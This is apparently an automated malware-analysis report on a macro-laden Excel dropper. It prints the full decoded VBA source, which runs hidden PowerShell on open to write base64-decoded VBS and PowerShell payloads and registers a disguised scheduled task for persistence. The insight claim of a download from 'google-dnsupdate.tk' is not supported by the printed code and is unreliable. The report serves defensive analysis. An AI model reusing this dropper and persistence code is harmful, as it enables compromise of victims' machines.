Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 293522e83aeebf18…

MALICIOUS

Office (OLE)

386.0 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2019-09-30
MD5: f76443385fef159e6b73ad6bf7f086d6 SHA-1: 402bd780eb5aad1e372e96ca5956b106521b4e33 SHA-256: 293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb
470 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The Workbook_Open macro in this Excel file executes a VBA script that utilizes WScript.Shell to create and run a PowerShell script. This PowerShell script is designed to download and execute a second-stage payload from the domain 'google-dnsupdate.tk'. The VBA script also attempts to create scheduled tasks and persistence mechanisms. The ClamAV detection of 'Xls.Dropper.Agent-6465255-0' and 'Vbs.Trojan.Oilrig-6332898-2' further confirms its malicious nature as a dropper.

Heuristics 11

  • ClamAV: Xls.Dropper.Agent-6465255-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-6465255-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set wss = CreateObject("wScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
            cmd = "powershell "" " & _
                  " &{ " & _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set wss = CreateObject("wScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
    Call Init
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4036 bytes
SHA-256: 327bb75f993144bf0d0cf4978424f41fb57ca14cc022516a93ce0cde35adf07f
Detection
ClamAV: Vbs.Trojan.Oilrig-6332898-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()
    Call Init
    Call ShowHideSheets
End Sub


Sub ShowHideSheets()
    
    If ActiveWorkbook.Worksheets(1).Visible Then
        Dim WS_Count As Integer
        Dim I As Integer
        WS_Count = ActiveWorkbook.Worksheets.Count
        For I = 1 To WS_Count
        ActiveWorkbook.Worksheets(I).Visible = True
        Next I
        ActiveWorkbook.Worksheets(1).Visible = False
        ActiveWorkbook.Worksheets(2).Activate
    End If
    
End Sub

Sub Init()
    
    On Error Resume Next

    
    Set wss = CreateObject("wScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    
    
    
    Dim fdname As String
    Dim tskname As String
    Dim updpath As String
    Dim dnpath As String
    Dim envstr As String
    Dim tskmin As String
    Dim hststr As String

    fdname = "Media"
    tskname = "NvidiaUpdate"
    tskmin = "2"
    hststr = wss.ExpandEnvironmentStrings("%computername%")
    envstr = wss.ExpandEnvironmentStrings("%userprofile%\AppData\Local\Microsoft\")
    
    updpath = envstr & fdname & "\upd.vbs"
    dnpath = envstr & fdname & "\dn.ps1"
    
   
    
    If Not (fso.FileExists(updpath)) Then
    
        fso.CreateFolder (envstr & fdname)
        fso.CreateFolder (envstr & fdname & "\dn")
        fso.CreateFolder (envstr & fdname & "\up")
    
        
        content_upd = ActiveWorkbook.Worksheets("Sheet1").Cells(1, 25)
        content_dn = ActiveWorkbook.Worksheets("Sheet1").Cells(1, 26)
        
        
        cmd = "powershell "" " & _
                  " &{ " & _
                  "$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" & _
                   content_upd & _
                  "')); Add-Content '" & _
                  updpath & _
                  "' $f; " & _
                  " $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" & _
                  content_dn & _
                  "')); Add-Content '" & _
                  dnpath & _
                  "' $fdn; " & _
                  "} "" "
            
            CreateObject("WScript.Shell").Run cmd, 0
           
                wss.Run "schtasks /create /F /sc minute /mo " & tskmin & " /tn " & Chr(34) & tskname & Chr(34) & " /tr " _
                & updpath, 0
        
        Set wss = Nothing
        Set fso = Nothing
        
    End If
        
            
        
    
End Sub





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.